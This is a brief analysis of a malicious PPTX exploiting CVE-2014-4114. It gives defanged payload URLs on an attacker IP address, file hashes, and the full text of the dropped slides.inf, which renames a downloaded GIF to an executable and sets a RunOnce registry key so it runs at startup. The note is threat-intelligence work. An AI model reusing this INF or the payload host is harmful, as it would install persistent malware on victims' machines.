CVE-2014-4114

quick and dirty analysis of PPTX using CVE-2014-4114:

sample of the file thanks to @artem_i_baranov pptx/pptsx.
https://www.virustotal.com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf/analysis/

after opening the 2 of the following files are being download:
hxxp://94[.]185[.]85[.]122/public/slide1[.]gif  MD5: 8a7c30a7a105bd62ee71214d268865e3
https://www.virustotal.com/en/file/0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bc/analysis/

94.185.85.122/public/slides.inf MD5: 8313034e9ab391df83f6a4f242ec5f8d
content of slides.inf:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; 61883.INF
; Copyright (c) Microsoft Corporation.  All rights reserved.

[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385

[DestinationDirs]
DefaultDestDir = 1

[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart

[RxRename]
slide1.gif.exe, slide1.gif
[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

It seems that the author of this attack worked hard to develop it but then used highly detected dropper, seems to be related to black energy:
http://www.eset.com/int/about/press/articles/article/eset-research-ukraine-and-poland-targeted-by-sophisticated-blackenergy-trojan/